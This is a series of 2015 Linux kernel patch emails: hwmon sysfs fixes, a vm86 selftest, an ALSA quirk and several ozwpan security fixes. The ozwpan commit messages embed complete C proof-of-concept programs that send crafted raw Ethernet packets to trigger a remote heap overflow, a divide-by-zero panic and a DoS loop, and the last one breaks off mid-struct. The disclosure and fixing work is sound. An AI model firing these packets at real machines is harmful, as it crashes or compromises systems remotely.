a/drivers/hwmon/tmp401.c +++ b/drivers/hwmon/tmp401.c @@ -44,7 +44,7 @@ #include /* Addresses to scan */ -static const unsigned short normal_i2c[] = { 0x37, 0x48, 0x49, 0x4a, 0x4c, 0x4d, +static const unsigned short normal_i2c[] = { 0x48, 0x49, 0x4a, 0x4c, 0x4d, 0x4e, 0x4f, I2C_CLIENT_END }; enum chips { tmp401, tmp411, tmp431, tmp432, tmp435 }; From 1b63bf617206ff35b93c57c67bbe067ac735a85a Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Thu, 28 May 2015 09:08:09 -0700 Subject: [PATCH 473/872] hwmon: (nct6775) Add missing sysfs attribute initialization The following error message is seen when loading the nct6775 driver with DEBUG_LOCK_ALLOC enabled. BUG: key ffff88040b2f0030 not in .data! ------------[ cut here ]------------ WARNING: CPU: 0 PID: 186 at kernel/locking/lockdep.c:2988 lockdep_init_map+0x469/0x630() DEBUG_LOCKS_WARN_ON(1) Caused by a missing call to sysfs_attr_init() when initializing sysfs attributes. Reported-by: Alexey Orishko Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v3.12+ Signed-off-by: Guenter Roeck --- drivers/hwmon/nct6775.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/hwmon/nct6775.c b/drivers/hwmon/nct6775.c index 4fcb48103299..bd1c99deac71 100644 --- a/drivers/hwmon/nct6775.c +++ b/drivers/hwmon/nct6775.c @@ -995,6 +995,7 @@ nct6775_create_attr_group(struct device *dev, struct sensor_template_group *tg, (*t)->dev_attr.attr.name, tg->base + i); if ((*t)->s2) { a2 = &su->u.a2; + sysfs_attr_init(&a2->dev_attr.attr); a2->dev_attr.attr.name = su->name; a2->nr = (*t)->u.s.nr + i; a2->index = (*t)->u.s.index; @@ -1005,6 +1006,7 @@ nct6775_create_attr_group(struct device *dev, struct sensor_template_group *tg, *attrs = &a2->dev_attr.attr; } else { a = &su->u.a1; + sysfs_attr_init(&a->dev_attr.attr); a->dev_attr.attr.name = su->name; a->index = (*t)->u.index + i; a->dev_attr.attr.mode = From c7bd6dc320b85445b6b36a0aff41f929210027c7 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Thu, 28 May 2015 09:12:23 -0700 Subject: [PATCH 474/872] hwmon: (nct6683) Add missing sysfs attribute initialization The following error message is seen when loading the nct6683 driver with DEBUG_LOCK_ALLOC enabled. BUG: key ffff88040b2f0030 not in .data! ------------[ cut here ]------------ WARNING: CPU: 0 PID: 186 at kernel/locking/lockdep.c:2988 lockdep_init_map+0x469/0x630() DEBUG_LOCKS_WARN_ON(1) Caused by a missing call to sysfs_attr_init() when initializing sysfs attributes. Reported-by: Alexey Orishko Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v3.18+ Signed-off-by: Guenter Roeck --- drivers/hwmon/nct6683.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/hwmon/nct6683.c b/drivers/hwmon/nct6683.c index f3830db02d46..37f01702d081 100644 --- a/drivers/hwmon/nct6683.c +++ b/drivers/hwmon/nct6683.c @@ -439,6 +439,7 @@ nct6683_create_attr_group(struct device *dev, struct sensor_template_group *tg, (*t)->dev_attr.attr.name, tg->base + i); if ((*t)->s2) { a2 = &su->u.a2; + sysfs_attr_init(&a2->dev_attr.attr); a2->dev_attr.attr.name = su->name; a2->nr = (*t)->u.s.nr + i; a2->index = (*t)->u.s.index; @@ -449,6 +450,7 @@ nct6683_create_attr_group(struct device *dev, struct sensor_template_group *tg, *attrs = &a2->dev_attr.attr; } else { a = &su->u.a1; + sysfs_attr_init(&a->dev_attr.attr); a->dev_attr.attr.name = su->name; a->index = (*t)->u.index + i; a->dev_attr.attr.mode = From c2affbf9a50882572e04645d5946ab0a921f061f Mon Sep 17 00:00:00 2001 From: Andy Lutomirski Date: Fri, 29 May 2015 14:58:24 -0700 Subject: [PATCH 475/872] x86/asm/entry/32, selftests: Add a selftest for kernel entries from VM86 mode Test a couple of special cases in 32-bit kernels for entries from vm86 mode. This will OOPS both old kernels due to a bug and and 4.1-rc5 due to a regression I introduced, and it should make sure that the SYSENTER-from-vm86-mode hack in the kernel keeps working. Signed-off-by: Andy Lutomirski Cc: Jan Beulich Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Shuah Khan Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/09a9916761e0a9e42d4922f147af45a0079cc1e8.1432936374.git.luto@kernel.org Tests: 394838c96013 x86/asm/entry/32: Fix user_mode() misuses Tests: 7ba554b5ac69 x86/asm/entry/32: Really make user_mode() work correctly for VM86 mode Signed-off-by: Ingo Molnar --- tools/testing/selftests/x86/Makefile | 6 +- tools/testing/selftests/x86/entry_from_vm86.c | 114 ++++++++++++++++++ 2 files changed, 118 insertions(+), 2 deletions(-) create mode 100644 tools/testing/selftests/x86/entry_from_vm86.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 5bdb781163d1..9b0d8baf2934 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -5,8 +5,10 @@ include ../lib.mk .PHONY: all all_32 all_64 warn_32bit_failure clean TARGETS_C_BOTHBITS := sigreturn single_step_syscall +TARGETS_C_32BIT_ONLY := entry_from_vm86 -BINARIES_32 := $(TARGETS_C_BOTHBITS:%=%_32) +TARGETS_C_32BIT_ALL := $(TARGETS_C_BOTHBITS) $(TARGETS_C_32BIT_ONLY) +BINARIES_32 := $(TARGETS_C_32BIT_ALL:%=%_32) BINARIES_64 := $(TARGETS_C_BOTHBITS:%=%_64) CFLAGS := -O2 -g -std=gnu99 -pthread -Wall @@ -32,7 +34,7 @@ all_64: $(BINARIES_64) clean: $(RM) $(BINARIES_32) $(BINARIES_64) -$(TARGETS_C_BOTHBITS:%=%_32): %_32: %.c +$(TARGETS_C_32BIT_ALL:%=%_32): %_32: %.c $(CC) -m32 -o $@ $(CFLAGS) $(EXTRA_CFLAGS) $^ -lrt -ldl $(TARGETS_C_BOTHBITS:%=%_64): %_64: %.c diff --git a/tools/testing/selftests/x86/entry_from_vm86.c b/tools/testing/selftests/x86/entry_from_vm86.c new file mode 100644 index 000000000000..5c38a187677b --- /dev/null +++ b/tools/testing/selftests/x86/entry_from_vm86.c @@ -0,0 +1,114 @@ +/* + * entry_from_vm86.c - tests kernel entries from vm86 mode + * Copyright (c) 2014-2015 Andrew Lutomirski + * + * This exercises a few paths that need to special-case vm86 mode. + * + * GPL v2. + */ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static unsigned long load_addr = 0x10000; +static int nerrs = 0; + +asm ( + ".pushsection .rodata\n\t" + ".type vmcode_bound, @object\n\t" + "vmcode:\n\t" + "vmcode_bound:\n\t" + ".code16\n\t" + "bound %ax, (2048)\n\t" + "int3\n\t" + "vmcode_sysenter:\n\t" + "sysenter\n\t" + ".size vmcode, . - vmcode\n\t" + "end_vmcode:\n\t" + ".code32\n\t" + ".popsection" + ); + +extern unsigned char vmcode[], end_vmcode[]; +extern unsigned char vmcode_bound[], vmcode_sysenter[]; + +static void do_test(struct vm86plus_struct *v86, unsigned long eip, + const char *text) +{ + long ret; + + printf("[RUN]\t%s from vm86 mode\n", text); + v86->regs.eip = eip; + ret = vm86(VM86_ENTER, v86); + + if (ret == -1 && errno == ENOSYS) { + printf("[SKIP]\tvm86 not supported\n"); + return; + } + + if (VM86_TYPE(ret) == VM86_INTx) { + char trapname[32]; + int trapno = VM86_ARG(ret); + if (trapno == 13) + strcpy(trapname, "GP"); + else if (trapno == 5) + strcpy(trapname, "BR"); + else if (trapno == 14) + strcpy(trapname, "PF"); + else + sprintf(trapname, "%d", trapno); + + printf("[OK]\tExited vm86 mode due to #%s\n", trapname); + } else if (VM86_TYPE(ret) == VM86_UNKNOWN) { + printf("[OK]\tExited vm86 mode due to unhandled GP fault\n"); + } else { + printf("[OK]\tExited vm86 mode due to type %ld, arg %ld\n", + VM86_TYPE(ret), VM86_ARG(ret)); + } +} + +int main(void) +{ + struct vm86plus_struct v86; + unsigned char *addr = mmap((void *)load_addr, 4096, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE, -1,0); + if (addr != (unsigned char *)load_addr) + err(1, "mmap"); + + memcpy(addr, vmcode, end_vmcode - vmcode); + addr[2048] = 2; + addr[2050] = 3; + + memset(&v86, 0, sizeof(v86)); + + v86.regs.cs = load_addr / 16; + v86.regs.ss = load_addr / 16; + v86.regs.ds = load_addr / 16; + v86.regs.es = load_addr / 16; + + assert((v86.regs.cs & 3) == 0); /* Looks like RPL = 0 */ + + /* #BR -- should deliver SIG??? */ + do_test(&v86, vmcode_bound - vmcode, "#BR"); + + /* SYSENTER -- should cause #GP or #UD depending on CPU */ + do_test(&v86, vmcode_sysenter - vmcode, "SYSENTER"); + + return (nerrs == 0 ? 0 : 1); +} From 2f80b2958abe5658000d5ad9b45a36ecf879666e Mon Sep 17 00:00:00 2001 From: Eric Wong Date: Sat, 30 May 2015 09:15:39 +0000 Subject: [PATCH 476/872] ALSA: usb-audio: don't try to get Outlaw RR2150 sample rate This quirk allows us to avoid the noisy: current rate 0 is different from the runtime rate message every time playback starts. While USB DAC in the RR2150 supports reading the sample rate, it never returns a sample rate other than zero in my observation with common sample rates. Signed-off-by: Eric Wong Cc: Joe Turner Cc: Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index 29175346cc4f..b8c97d092a47 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1120,6 +1120,7 @@ bool snd_usb_get_sample_rate_quirk(struct snd_usb_audio *chip) case USB_ID(0x045E, 0x0772): /* MS Lifecam Studio */ case USB_ID(0x045E, 0x0779): /* MS Lifecam HD-3000 */ case USB_ID(0x04D8, 0xFEEA): /* Benchmark DAC1 Pre */ + case USB_ID(0x074D, 0x3553): /* Outlaw RR2150 (Micronas UAC3553B) */ return true; } return false; From d114b9fe78c8d6fc6e70808c2092aa307c36dc8e Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:06:58 +0200 Subject: [PATCH 477/872] ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index d434d8c6fff6..b573ad3e9674 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -390,10 +390,15 @@ void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; - int data_len = elt->length - - sizeof(struct oz_get_desc_rsp) + 1; - u16 offs = le16_to_cpu(get_unaligned(&body->offset)); - u16 total_size = + u16 offs, total_size; + u8 data_len; + + if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) + break; + data_len = elt->length - + (sizeof(struct oz_get_desc_rsp) - 1); + offs = le16_to_cpu(get_unaligned(&body->offset)); + total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, From b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:06:59 +0200 Subject: [PATCH 478/872] ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozhcd.c | 8 ++++---- drivers/staging/ozwpan/ozusbif.h | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c index 5ff4716b72c3..784b5ecfa849 100644 --- a/drivers/staging/ozwpan/ozhcd.c +++ b/drivers/staging/ozwpan/ozhcd.c @@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport) /* * Context: softirq */ -void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, - int length, int offset, int total_size) +void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc, + u8 length, u16 offset, u16 total_size) { struct oz_port *port = hport; struct urb *urb; @@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, if (!urb) return; if (status == 0) { - int copy_len; - int required_size = urb->transfer_buffer_length; + unsigned int copy_len; + unsigned int required_size = urb->transfer_buffer_length; if (required_size > total_size) required_size = total_size; diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h index 4249fa374012..d2a6085345be 100644 --- a/drivers/staging/ozwpan/ozusbif.h +++ b/drivers/staging/ozwpan/ozusbif.h @@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd); /* Confirmation functions. */ -void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, - const u8 *desc, int length, int offset, int total_size); +void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, + const u8 *desc, u8 length, u16 offset, u16 total_size); void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode, const u8 *data, int data_len); From 04bf464a5dfd9ade0dda918e44366c2c61fce80b Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:07:00 +0200 Subject: [PATCH 479/872] ozwpan: divide-by-zero leading to panic A network supplied parameter was not checked before division, leading to a divide-by-zero. Since this happens in the softirq path, it leads to a crash. A PoC follows below, which requires the ozprotocol.h file from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; struct oz_elt oz_elt2; struct oz_multiple_fixed oz_multiple_fixed; } __packed packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 0, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 }, .oz_elt2 = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_multiple_fixed) }, .oz_multiple_fixed = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_USB_ENDPOINT_DATA, .endpoint = 0, .format = OZ_DATA_F_MULTIPLE_FIXED, .unit_size = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index b573ad3e9674..7b13dc910172 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -326,7 +326,10 @@ static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx, struct oz_multiple_fixed *body = (struct oz_multiple_fixed *)data_hdr; u8 *data = body->data; - int n = (len - sizeof(struct oz_multiple_fixed)+1) + int n; + if (!body->unit_size) + break; + n = (len - sizeof(struct oz_multiple_fixed)+1) / body->unit_size; while (n--) { oz_hcd_data_ind(usb_ctx->hport, body->endpoint, From 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:07:01 +0200 Subject: [PATCH 480/872] ozwpan: unchecked signed subtraction leads to DoS The subtraction here was using a signed integer and did not have any bounds checking at all. This commit adds proper bounds checking, made easy by use of an unsigned integer. This way, a single packet won't be able to remotely trigger a massive loop, locking up the system for a considerable amount of time. A PoC follows below, which requires ozprotocol.h from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; struct oz_elt oz_elt2; struct oz_multiple_fixed oz_multiple_fixed; } __packed packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 0, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 